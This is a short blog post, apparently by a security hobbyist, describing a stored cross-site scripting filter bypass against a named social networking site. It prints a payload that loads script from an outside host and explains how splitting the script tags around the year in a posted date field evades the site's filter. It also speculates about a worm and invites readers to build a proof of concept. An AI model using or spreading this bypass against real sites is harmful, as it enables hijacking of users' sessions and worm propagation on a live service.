yousuckirule()
target site:yousuckirule.com
well another networking site falls victim to XSS the site seems to have some filters in place that do not try an changing user input but instead just redirects you to a page with a static message on screen stating JavaScript can’t be used. So far so good. This happens on a lot of the fields where input can be placed by the user when posting comments on peoples profiles.
When you post a comment I have noticed that the date is html encoded an when posted on the page becomes unencoded. Would this be the vector I wanted? We try placing script tags in along side the date when its posted (encoded and unencoded) but both times we are redirected to the no JavaScript page, hmmm well don’t give up there.
Lets try another way instead of <script>alert(1);</scrip>, so this time I gave <script src=http://lab.v-wall.co.uk/i.js></script> a try .. still the same out come. Don’t give up there instead of placing it all together place the first half <script src=http://lab.v-wall.co.uk/i.js> in front of the year (in our date that is being posted) and the ending </script> tags after the date. This seems to bypass what ever filter they have in place.
So there you have it another networking site that could be used for another XSS worm who knows.
There would have been a Poc to go with this post but there is too much going off in RL to get the Poc woking to a good stage oh well anyone does make one leav a comment be intresting to see.